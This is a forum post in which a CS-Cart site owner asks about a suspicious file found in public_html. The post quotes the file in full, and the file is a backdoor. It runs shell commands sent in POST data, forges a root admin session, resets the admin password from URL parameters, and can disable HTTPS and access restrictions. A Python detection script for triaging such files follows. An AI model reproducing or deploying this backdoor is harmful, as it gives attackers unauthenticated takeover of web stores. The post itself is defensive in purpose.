I've recently noticed a file in the public_html folder; its name is /enterle.php and the code in it is as follows. I've changed the password details in case it is sensitive info.
if ($_GET['mode'] == 'shell'){
echo '
';
if ($_POST['cmd']){
exec($_POST['cmd'], $out);
foreach ($out as $k => $v){
echo "
".$v."";
}
}
echo '
';
die();
}
DEFINE ('AREA', 'A');
DEFINE ('AREA_NAME' ,'admin');
define('ACCOUNT_TYPE', 'admin');
require './prepare.php';
require './init.php';
if ($_GET['mode'] == 'login' && !isset($_GET['kill'])) {
$auth = array (
'user_id' => 1,
'user_type' => 'A',
'area' => 'A',
'login' => 'admin',
'password_change_timestamp' => time(),
'first_expire_check' => false,
'this_login' => time(),
'is_root' => 'Y'
);
$_SESSION['auth'] = $auth;
$_SESSION['last_status'] = '-------------------';
fn_redirect(Registry::get('config.admin_index'));
}
if ($_GET['mode'] == 'login' && isset($_GET['kill'])) {
$auth = array (
'user_id' => 1,
'user_type' => 'A',
'area' => 'A',
'login' => 'admin',
'membership_id' => '0',
'password_change_timestamp' => time(),
'first_expire_check' => false,
'this_login' => time(),
'is_root' => 'Y'
);
$_SESSION['auth'] = $auth;
$_SESSION['last_status'] = '------------------';
unlink('sph.php');
if (!is_file('sph.php')) {
fn_set_notification('N','Notice', 'sph.php is removed');
} else {
fn_set_notification('E', 'Error', 'sph.php is not removed!');
}
fn_redirect(Registry::get('config.admin_index'));
}
if ($_GET['mode'] == 'logout') {
$auth = array();
unset($_SESSION['auth']);
fn_redirect(Registry::get('config.admin_index'));
}
if ($_GET['mode'] == 'change_password') {
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", md5('5894admin'));
echo "Password Changed to '5894admin'!";
}
if ($_GET['mode'] == 'restore_password' && !empty($_GET['passwd'])) {
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", $_GET['passwd']);
echo "Password Restored to $_GET[passwd]!";
}
if ($_GET['mode'] == 'restore_password_md5' && !empty($_GET['passwd'])) {
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", md5($_GET['passwd']));
echo "Password Restored to $_GET[passwd]!";
}
if ($_GET['mode'] == 'remove_https') {
db_query("UPDATE ?:settings SET value='N' WHERE option_name='secure_checkout'");
db_query("UPDATE ?:settings SET value='N' WHERE option_name='secure_admin'");
echo "HTTPS disabled!";
}
if ($_GET['mode'] == 'ignore_AR') {
db_query("UPDATE ?:addons SET status='D' WHERE addon='access_restrictions'");
echo "Access Restriction is disabled!";
}
if ($_GET['mode'] == 'phpinfo') {
phpinfo();
}
?>
Should I be worried about this file and what is its purpose?
Is this a standard CS-Cart file?
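
An added example, not part of the original post and not CS-Cart code: a small Python triage script that flags the behaviours visible in the file above (request input passed to exec, a directly assigned admin session, password and security-setting updates, phpinfo) so the rest of the web root can be checked for similar files. The rule names and the SAMPLE text are constructed for illustration; a hit means "review this file", not proof of compromise.

```python
import re
import sys
from pathlib import Path

# Rules derived from the posted file; the rule names are hypothetical labels.
RULES = {
    "request-to-command": re.compile(
        r"\b(?:exec|system|passthru|shell_exec|popen|proc_open)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"),
    "session-auth-assigned": re.compile(r"\$_SESSION\s*\[\s*['\"]auth['\"]\s*\]\s*=(?!=)"),
    "root-flag-literal": re.compile(r"['\"]is_root['\"]\s*=>\s*['\"]Y['\"]"),
    "password-update": re.compile(r"UPDATE\s+\S*users\s+SET\s+password", re.I),
    "security-setting-off": re.compile(
        r"UPDATE\s+\S*(?:settings|addons)\s+SET\s+(?:value|status)\s*=\s*'[ND]'", re.I),
    "phpinfo": re.compile(r"\bphpinfo\s*\("),
}

def scan_text(text):
    """Return {rule_name: [line numbers]} for every rule that matches."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES.items():
            if rx.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def scan_tree(root):
    """Scan every *.php file under root; yield (path, hits) for files with findings."""
    for path in sorted(Path(root).rglob("*.php")):
        hits = scan_text(path.read_text(errors="replace"))
        if hits:
            yield path, hits

# Constructed sample built from lines quoted in the post, plus one benign unset().
SAMPLE = """\
if ($_POST['cmd']){
exec($_POST['cmd'], $out);
}
$_SESSION['auth'] = $auth;
unset($_SESSION['auth']);
db_query("UPDATE ?:users SET password = ?s WHERE user_id='1'", md5($_GET['passwd']));
db_query("UPDATE ?:settings SET value='N' WHERE option_name='secure_admin'");
phpinfo();
"""

if __name__ == "__main__":
    # Usage: python scan.py /path/to/public_html  (no argument scans SAMPLE)
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]):
            print(path, hits)
    else:
        print(scan_text(SAMPLE))
```

Files that trip several rules at once, as the posted one would, are the ones to compare first against a clean copy of the application's distribution.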